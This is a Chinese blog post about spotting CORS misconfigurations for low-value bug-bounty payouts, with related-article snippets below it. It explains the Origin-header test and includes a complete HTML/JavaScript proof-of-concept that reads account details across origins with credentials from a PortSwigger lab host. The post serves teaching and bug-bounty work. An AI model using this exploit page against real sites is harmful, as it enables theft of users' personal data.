企业SRC捡钱之CORS跨域漏洞

最新推荐文章于 2024-06-14 09:32:35 发布
最新推荐文章于 2024-06-14 09:32:35 发布
阅读量410 收藏 10
点赞数 8
文章标签: 安全 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_66717977/article/details/136694882
版权

更多更好的内容请关注微信公众号“猎洞时刻”!!!

重要的事情说三遍,禁止做非法渗透!!!禁止做非法渗透!!!禁止做非法渗透!!!

前言

在企业SRC挖掘中,CORS漏洞的挖掘是极其简单的,只需要一个Origin: foo.example.org 就能验证,是一个低危捡钱漏洞,价值大概在50-100之间。

CORS是什么?

    跨域资源共享 (CORS) 是一种浏览器机制,可以对位于给定域之外的资源进行受控访问。它扩展并增加了同源策略 ( SOP ) 的灵活性。但是,如果网站的 CORS 策略配置和实施不当,它也会为基于跨域的攻击提供可能性。

话不多说,我直接讲怎么挖掘这个漏洞。

漏洞验证

只需要在header中添加以下内容即可验证。

Origin: foo.example.org

图片

然后返回值携带以下,就能证明存在跨域漏洞。

Access-Control-Allow-Origin: foo.example.orgAccess-Control-Allow-Credentials: true

图片

如果出现以下,或者是其他不符合上面的那个情况,说明不存在漏洞。​​​​​​​

Access-Control-Allow-Origin: *Access-Control-Allow-Credentials: true

漏洞价值点

    这种漏洞,一般出现在那些含有敏感信息的地方才有危害,比如个人简历信息,个人收货地址信息,个人身份信息等,如果这些地方出现跨域漏洞,就可能造成攻击者盗取敏感信息。

BURP靶场

验证该漏洞,可以去burp的官方靶场进行学习,比较方便。

https://portswigger.net/web-security/all-labs

图片

图片

如果能够成功跨域读取,就说明漏洞利用成功。

图片

漏洞验证代码

以下是一个完整的整体,复制粘贴的时候分段了。。。

<html><body><center><h2>CORS POC Exploit</h2><h3>Extract SID</h3>

<div id="demo"><button type="button" onclick="cors()">Exploit</button></div>

<script>function cors() {    var xhttp = new XMLHttpRequest();    xhttp.onreadystatechange = function() {        console.log(xhttp.responseText);        if (this.readyState == 4 && this.status == 200) {            document.getElementById("demo").innerHTML = alert(this.responseText);        }    };    xhttp.open("GET", "https://0a83004403e4d69a8146704500d70033.web-security-academy.net/accountDetails", true);               xhttp.withCredentials = true;    xhttp.send();}</script></body></html>

更多更好的内容请关注微信公众号“猎洞时刻”!!!

CengLnH
关注
  • 8
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SRC挖掘经验-cors劫持账户.docx
04-13
懂的自然懂,也可以去一些知名社区找类似的。这个文档里写的有SRC漏洞挖掘的思路和手法,需要用到一些抓包改包软件,例如burpsuite。不太了解这些工具的话可以先去了解一下。祝师傅日日挖高危。
你可能不知道的CORS跨域资源共享
10-17
主要给大家介绍了关于CORS跨域资源共享的相关资料,文中通过示例代码介绍的非常详细,对大家的学习或者使用CORS具有一定的参考学习价值,需要的朋友们下面来一起学习学习吧
Web漏洞CORS与JSONP跨域漏洞
小赵同学的博客
06-26 703
CORS与JSONP跨域漏洞
SRC挖掘|Cors跨域漏洞|DoraBox漏洞利用
qq_60115503的博客
04-18 3868
简介 网站如果存在CORS跨域漏洞就会有用户敏感数据被窃取的风险 跨域资源共享(CORS)是一种浏览器机制,可实现对位于给定域外部的资源的受控访问,它扩展了同源策略(SOP)并增加了灵活性,但是,如果网站的CORS策略配置和实施不当,他也可能带来基于跨域的攻击,CORS并不是针对跨域攻击[例如跨站点请求伪造CSRF]的保护措施 同源策略 这里我们必须要了解一下同源策略:同源策略是一种限制性的跨域规范,它限制了网站与源域之外的资源进行交互的能力,起源于多年前的策略是针对潜在恶意跨域交互(例如 一个网站
CORS跨域资源共享及解决方案
憧憬个人博客
02-08 1543
为什么会出现跨域的问题?Javascript的访问是根据同源策略来的,同源策略即(同端口,同协议,同域名)。现在主流的开发方式都是前后端分离,所以很容易就出现跨域的问题。cors跨域资源共享,解决了前后端分离的资源共享问题。目前主流的浏览器都支持corsCORS出现场景 简答请求和非简单请求有些情况并不会触发cors的预检请求(即Options请求)我们将这种称...
CORS——从理解到验证
wonain的博客
05-03 2134
CORS的本质 CORS (Cross-Origin Resource Sharing跨源资源共享) 是一种认证机制,是 W3C (万维网联盟) 推荐的一种用于跨域资源访问的安全策略。 源与同源策略 CORS 中的源指的是某个URL中的协议、域名和端口,由这三个元素标识一个唯一的源,如 http://localhost:8080 和 https://localhost:8000 是不同的源,因为它...
CORS跨域漏洞的学习
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
07-27 8293
学习CORS漏洞和相关的一些知识梳理,网站如果存在这个漏洞就会有用户敏感数据被窃取的风险。 0x00 从浏览器的同源策略说起 SOP,同源策略 (Same Origin Policy),该策略是浏览器的一个安全基石,如果没有同源策略,那么,你打开了一个合法网站,又打开了一个恶意网站。恶意网站的脚本能够随意的操作合法网站的任何可操作资源,没有任何限制。 (图片来自网络) ...
CORS跨域漏洞学习
weixin_45116657的博客
02-15 1059
前言 CORS全称为Cross-Origin Resource Sharing即跨域资源共享,用于绕过SOP(同源策略)来实现跨域资源访问的一种技术。而CORS漏洞则是利用CORS技术窃取用户敏感数据。以往与CORS漏洞类似的JSONP劫持虽然已经出现了很多年,但由于部分厂商对此不够重视导致其仍在不断发展和扩散。 一、CORS及SOP简介 对CORS的介绍要从浏览器的同源策略开始说...
浅析CORS跨域漏洞与JSONP劫持
道阻且长,行则将至。
02-09 2242
文章目录前言同源策略AJAX技术CORS跨域跨域流程攻击流程漏洞验证靶场实例检测方法结合XSS漏洞扫描防护方案JSONP劫持利用过程靶场实例漏洞挖掘防护方案 前言 CORS 全称为 Cross-Origin Resource Sharing ,即跨域资源共享,用于绕过SOP(同源策略)来实现跨域资源访问的一种技术。而 CORS 漏洞则是利用 CORS 技术窃取用户敏感数据。 JSONP 全称是 JSON with Padding ,是基于 JSON 格式的为解决跨域请求资源而产生的解决方案。JSONP 实现
用于检测HTTP请求头缺失和CORS跨域漏洞的工具
07-02
用于检测HTTP请求头缺失和CORS跨域漏洞的工具
react中fetch之cors跨域请求的实现方法
08-27
本篇文章主要介绍了react中fetch之cors跨域请求的实现方法,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
JS跨域解决方案之使用CORS实现跨域
11-24
主要原因还是由于安全限制(同源策略, 即JavaScript或Cookie只能访问同域下的内容),因为我们在日常的项目开发时会不可避免的需要进行跨域操作,所以跨域能力也算是前端工程师的基本功之一。  和大多数跨域的解决...
等保测评和安全运维
weixin_64392888的博客
06-11 627
通过将等保测评的标准和流程融入日常的安全运维工作中,企业可以更有效地识别和应对网络安全威胁,构建起一个全面、动态的网络安全防护体系。为了应对这些挑战,企业不仅要实施有效的安全运维措施,还需要通过等保测评确保其信息系统符合国家的安全标准。等保测评提供了一套标准化的安全要求,安全运维团队可以根据这些要求,实施相应的安全措施,如加强访问控制、数据加密、网络安全防护等。通过等保测评,企业可以识别信息系统的安全风险,并根据测评结果制定或调整安全策略,确保安全措施与企业的实际需求相匹配。
《软件定义安全》之六:SDN和NFV安全实践
大龄IT民工
06-11 1283
DDoS检测清洗应用ADS APP的设计思路:借助安全控制平台中流相关的组件,从SDN控制器中获得相应的流量,并根据抗DDoS应用订阅的恶意流特征进行检测,发现恶意流量后,应用可根据细粒度的检测判断是否出现恶意攻击。如是,则下发实时清洗的流指令,即可将恶意流量牵引到清洗设备ADS上。过程如下:➊注册。启动阶段,ADS设备和ADS APP均向安全控制平台注册,提供自己的基本信息,如类型、位置和能力等。➋订阅。为获取并检查可疑流,ADS APP向安全控制器发送订阅。➌流统计获取和检查。
如何确保数据跨域交换安全、合规、可追溯性?
最新发布
文件数据安全交换
06-14 223
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。针对上述问题,推荐采用统一的数据跨域交换管控平台,如飞驰云联《Ftrans MDE多区域文件交换系统》,帮助企业构建统一、安全、高效的数据跨域交换通道,确保数据在多地理区域、多网络区域、多分支机构间准确、高效地传输。问题:明文传输,容易被截获和窃取;
展会邀请 | 龙智即将亮相2024上海国际嵌入式展,带来安全合规、单一可信数据源、可追溯、高效协同的嵌入式开发解决方案
weixin_49715102的博客
06-09 944
凭借在DevSecOps领域的深厚积累,龙智在全球范围内遴选优秀的专业工具,为嵌入式开发行业打造了专属的嵌入式开发解决方案,并提供专业咨询、方案定制、实施部署、专业培训、定制开发等一站式服务支持。等全球专业工具,覆盖嵌入式软件单元测试、静态代码分析、需求管理、版本控制、生命周期管理及项目管理、知识库管理等领域,助力企业实现安全合规、可追溯、单一可信数据源、高效协同的嵌入式开发。并且嵌入式系统往往非常复杂,需要全面的测试覆盖、高效的测试执行,才能确保系统的可靠性和正确性,以及产品的及时交付。
安全漏洞扫描工具
weixin_45639224的博客
06-05 685
安全漏洞扫描工具
蓝牙安全入门——两道CTF题目复现
weixin_66578482的博客
06-10 877
🚀🚀蓝牙中的安全管理协议(Security Manager Protocol,SMP)是负责蓝牙设备间的配对和加密的协议。🚀🚀SMP广泛应用于需要安全数据传输的蓝牙设备,如智能手表、健身追踪器、无线耳机和医疗设备。🚀🚀SMP的主要功能之一是处理设备间的配对过程。🚀🚀最近一直对车联网比较感兴趣,但是面试官说我有些技术栈缺失,所以还得狠狠补,先从蓝牙开始吧,因为刚好有道CTF的题目可以复现一下。🚀🚀虽然SMP提供了题目 蓝牙钥匙的春天 题目 low_energy_crypto
cors跨域漏洞概述
10-11
CORS(跨来源资源共享)是一个用于浏览器和服务器之间通信的机制,它允许服务器在响应中添加一些...为了防止 CORS 跨域漏洞,服务器需要对来自非法域名的跨域请求进行严格检查,并且不要将敏感信息包含在跨域响应中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值